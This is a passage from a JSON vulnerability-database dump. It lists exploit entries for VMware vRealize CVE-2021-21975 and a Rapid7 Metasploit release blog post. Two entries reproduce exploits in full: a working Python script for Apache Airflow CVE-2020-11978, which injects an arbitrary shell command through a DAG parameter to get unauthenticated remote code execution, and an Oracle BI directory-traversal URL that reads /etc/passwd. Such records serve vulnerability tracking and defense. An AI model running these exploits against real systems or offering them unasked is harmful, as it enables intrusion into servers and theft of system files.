"NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations 
Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request 
Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-25T19:01:57", "description": "## 0x01 
\u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-01T01:14:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "modified": "2022-03-25T11:15:15", "id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "exploitdb": [{"lastseen": "2023-06-05T14:52:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-02T00:00:00", "type": "exploitdb", "title": "Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11978", "2020-13927", "CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "EDB-ID:49927", "href": "https://www.exploit-db.com/exploits/49927", "sourceData": "# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution\n# Date: 2021-06-02\n# Exploit Author: Pepe Berba\n# Vendor Homepage: https://airflow.apache.org/\n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html\n# Version: <= 1.10.10\n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)\n# CVE : CVE-2020-11978\n#\n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow\n# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.\n# Together, potentially allows unauthenticated RCE to Airflow\n#\n# Repo: https://github.com/pberba/CVE-2020-11978\n# More information can be found here:\n# 
https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E\n#\n# Remediation:\n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.\n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.\n#\n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\"\n\nimport argparse\nimport requests\nimport sys\nimport time\n\ndef create_dag(url, cmd):\n\tprint('[+] Checking if Airflow Experimental REST API is accessible...')\n\tcheck = requests.get('{}/api/experimental/test'.format(url))\n\n\tif check.status_code == 200:\n\t\tprint('[+] /api/experimental/test returned 200' )\n\telse:\n\t\tprint('[!] /api/experimental/test returned {}'.format(check.status_code))\n\t\tprint('[!] Airflow Experimental REST API may not be accessible')\n\t\tsys.exit(1)\n\n\tcheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))\n\tif check_task.status_code != 200:\n\t\tprint('[!] Failed to find the example_trigger_target_dag.bash_task')\n\t\tprint('[!] Host isn\\'t vulnerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\telif 'dag_run' in check_task.json()['env']:\n\t\tprint('[!] example_trigger_target_dag.bash_task is patched')\n\t\tprint('[!] Host isn\\'t vulnerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\tprint('[+] example_trigger_target_dag.bash_task is vulnerable')\n\n\tunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))\n\tif unpause.status_code != 200:\n\t\tprint('[!] Unable to enable example_trigger_target_dag. 
Example dags were not loaded')\n\t\tsys.exit(1)\n\telse:\n\t\tprint('[+] example_trigger_target_dag was enabled')\n\n\tprint('[+] Creating new DAG...')\n\tres = requests.post(\n\t '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),\n\t json={\n\t 'conf': {\n\t 'message': '\"; {} #'.format(cmd)\n\t }\n\t }\n\t)\n\n\tif res.status_code == 200:\n\t\tprint('[+] Successfully created DAG')\n\t\tprint('[+] \"{}\"'.format(res.json()['message']))\n\telse:\n\t\tprint('[!] Failed to create DAG')\n\t\tsys.exit(1)\n\n\twait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(\n\t\turl = url,\n\t\texecution_date=res.json()['execution_date']\n\t)\n\n\tstart_time = time.time()\n\tprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.')\n\tprint('[.] If the bash task is never queued, then the scheduler might not be running.')\n\twhile True:\n\t\ttime.sleep(10)\n\t\tres = requests.get(wait_url)\n\t\tstatus = res.json()['state']\n\t\tif status == 'queued':\n\t\t\tprint('[.] Bash task queued...')\n\t\telif status == 'running':\n\t\t\tprint('[+] Bash task running...')\n\t\telif status == 'success':\n\t\t\tprint('[+] Bash task successfully ran')\n\t\t\tbreak\n\t\telif status == 'None':\n\t\t\tprint('[-] Bash task is not yet queued...'.format(status))\n\t\telse:\n\t\t\tprint('[!] 
Bash task was {}'.format(status))\n\t\t\tsys.exit(1)\n\n\treturn 0\n\n\ndef main():\n\targ_parser = argparse.ArgumentParser()\n\targ_parser.add_argument('url', type=str, help=\"Base URL for Airflow\")\n\targ_parser.add_argument('command', type=str)\n\targs = arg_parser.parse_args()\n\n\tcreate_dag(\n\t\targs.url,\n\t\targs.command\n\t)\n\nif __name__ == '__main__':\n\tmain()", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/multiple/webapps/49927.py", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T14:54:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-28T00:00:00", "type": "exploitdb", "title": "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-14864", "CVE-2020-14864"], "modified": "2020-10-28T00:00:00", "id": "EDB-ID:48964", "href": "https://www.exploit-db.com/exploits/48964", "sourceData": "# Exploit Title: Oracle Business Intelligence Enterprise Edition 
5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion\n# Date: 2020-10-27\n# Exploit Author: Ivo Palazzolo (@palaziv)\n# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html\n# Vendor Homepage: https://www.oracle.com\n# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html\n# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0\n# Tested on: SUSE Linux Enterprise Server\n# CVE: CVE-2020-14864\n\n# Description\nA Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.\n\n# PoC\nhttps://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/webapps/48964.txt", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2023-02-10T20:40:56", "description": "## Taking a stroll down memory lane (Tomcat Init Script Privilege Escalation)\n\n\n\nDo you remember the issue with Tomcat init script that was originally discovered by [Dawid Golunski](<https://twitter.com/dawid_golunski?lang=en>) back in 2016 that led to privilege escalation? This week's Metasploit release includes an exploit module for `CVE-2016-1240` by [h00die](<https://github.com/h00die>). This vulnerability allows any local users who already have tomcat accounts to perform privilege escalation and gain access to a target system as a root user. 
This exploit can be used against the following tomcat versions Tomcat 8 (8.0.36-2), Tomcat 7 (7.0.70-2) and Tomcat 6 (6.0.45+dfsg-1~deb8u1).\n\n## Lenovo Diagnostics Driver IOCTL memmove\n\nOur own [Jack Heysel](<https://github.com/jheysel-r7>) contributed an exploit module for `CVE-2022-3699` using the proof of concept created by [alfarom256](<https://github.com/alfarom256>). A vulnerability within Lenovo Diagnostics Driver due to incorrect access control allows low-privileged users to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.\n\n## New module content (8)\n\n### Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution\n\nAuthor: Matthew Mathur \nType: Exploit \nPull request: [#17494](<https://github.com/rapid7/metasploit-framework/pull/17494>) contributed by [k0pak4](<https://github.com/k0pak4>) \nAttackerKB reference: [CVE-2021-25298](<https://attackerkb.com/topics/c1866NX9mx/cve-2021-25298?referrer=blog>)\n\nDescription: A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the `apache` user on NagiosXI devices running version 5.5.6 to 5.7.5 inclusive.\n\n### F5 Big-IP Create Admin User\n\nAuthor: Ron Bowes \nType: Exploit \nPull request: [#17392](<https://github.com/rapid7/metasploit-framework/pull/17392>) contributed by [rbowes-r7](<https://github.com/rbowes-r7>)\n\nDescription: This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account.\n\n### Apache Tomcat on Ubuntu Log Init Privilege Escalation\n\nAuthors: Dawid Golunski and h00die \nType: Exploit \nPull request: [#17483](<https://github.com/rapid7/metasploit-framework/pull/17483>) contributed by [h00die](<https://github.com/h00die>) \nAttackerKB reference: [CVE-2016-1240](<https://attackerkb.com/topics/fulwOZwkR6/cve-2016-1240?referrer=blog>)\n\nDescription: Adds a new 
`exploit/linux/local/tomcat_ubuntu_log_init_priv_esc` module for CVE-2016-1240 targeting Tomcat (6, 7, 8). By default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system.\n\n### Fortra GoAnywhere MFT Unsafe Deserialization RCE\n\nAuthor: Ron Bowes \nType: Exploit \nPull request: [#17607](<https://github.com/rapid7/metasploit-framework/pull/17607>) contributed by [rbowes-r7](<https://github.com/rbowes-r7>) \nAttackerKB reference: [CVE-2023-0669](<https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669?referrer=blog>)\n\nDescription: This PR adds a module that exploits CVE-2023-0669, which is an object deserialization vulnerability in Fortra GoAnywhere MFT.\n\n### ManageEngine ADSelfService Plus Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, and horizon3ai \nType: Exploit \nPull request: [#17556](<https://github.com/rapid7/metasploit-framework/pull/17556>) contributed by [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \nAttackerKB reference: [CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This PR adds an exploit that uses an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ADSelfService Plus versions 6210 and below (<https://github.com/advisories/GHSA-4w3v-83v8-mg94>).\n\n### ManageEngine ServiceDesk Plus Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, and horizon3ai \nType: Exploit \nPull request: [#17527](<https://github.com/rapid7/metasploit-framework/pull/17527>) contributed by [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \nAttackerKB reference: 
[CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This adds an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below. (<https://github.com/advisories/GHSA-4w3v-83v8-mg94>).\n\n### ManageEngine Endpoint Central Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, h00die-gr3y, and horizon3ai \nType: Exploit \nPull request: [#17567](<https://github.com/rapid7/metasploit-framework/pull/17567>) contributed by [h00die-gr3y](<https://github.com/h00die-gr3y>) \nAttackerKB reference: [CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This adds an exploit targeting CVE-2022-47966, an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below. See <https://github.com/advisories/GHSA-mqq7-v29v-25f6> and [ManageEngine security advisory](<https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html>).\n\n### Lenovo Diagnostics Driver IOCTL memmove\n\nAuthors: alfarom256 and jheysel-r7 \nType: Exploit \nPull request: [#17371](<https://github.com/rapid7/metasploit-framework/pull/17371>) contributed by [jheysel-r7](<https://github.com/jheysel-r7>) \nAttackerKB reference: [CVE-2022-3699](<https://attackerkb.com/topics/v6avP6vl1U/cve-2022-3699?referrer=blog>)\n\nDescription: This PR adds a module that makes use of incorrect access control for the Lenovo Diagnostics Driver allowing a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.\n\n## Enhancements and features (3)\n\n * [#17597](<https://github.com/rapid7/metasploit-framework/pull/17597>) from [bcoles](<https://github.com/bcoles>) \\- Fix notes for SideEffects and Reliability in the `auxiliary/dos/mirageos/qubes_mirage_firewall_dos` module.\n * 
[#17603](<https://github.com/rapid7/metasploit-framework/pull/17603>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates `admin/kerberos/inspect_ticket` to show the UPN and DNS Information within a decrypted PAC.\n * [#17615](<https://github.com/rapid7/metasploit-framework/pull/17615>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds missing module notes for stability, reliability, and side effects to several modules.\n\n## Bugs fixed (2)\n\n * [#17591](<https://github.com/rapid7/metasploit-framework/pull/17591>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed in metasm_shell and nasm_shell whereby the shells were using readline but the dependency wasn't correctly imported. This has since been fixed and improved validation has been added.\n * [#17592](<https://github.com/rapid7/metasploit-framework/pull/17592>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed in the `bypassuac_injection_winsxs` module whereby a string was not properly being treated as being NULL terminated. 
Additionally, the definitions of the `FindFirstFileA` and `FindFirstFileW` functions have been corrected so that they work on x64 systems.\n\n## Documentation added (3)\n\n * [#17398](<https://github.com/rapid7/metasploit-framework/pull/17398>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Adds additional details on using command stagers.\n * [#17587](<https://github.com/rapid7/metasploit-framework/pull/17587>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR updates docs.metasploit.com to use the latest ruby conventions.\n * [#17595](<https://github.com/rapid7/metasploit-framework/pull/17595>) from [mkonda](<https://github.com/mkonda>) \\- Updates the documentation on debugging dead Meterpreter sessions to use the correct option name `ReverseListenerBindAddress`.\n\nYou can always find more documentation on our docsite at [docs.metasploit.com](<https://docs.metasploit.com/>).\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.3.1...6.3.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222023-02-02T12%3A03%3A09-06%3A00..2023-02-09T11%3A57%3A08-06%3A00%22>)\n * [Full diff 6.3.1...6.3.2](<https://github.com/rapid7/metasploit-framework/compare/6.3.1...6.3.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
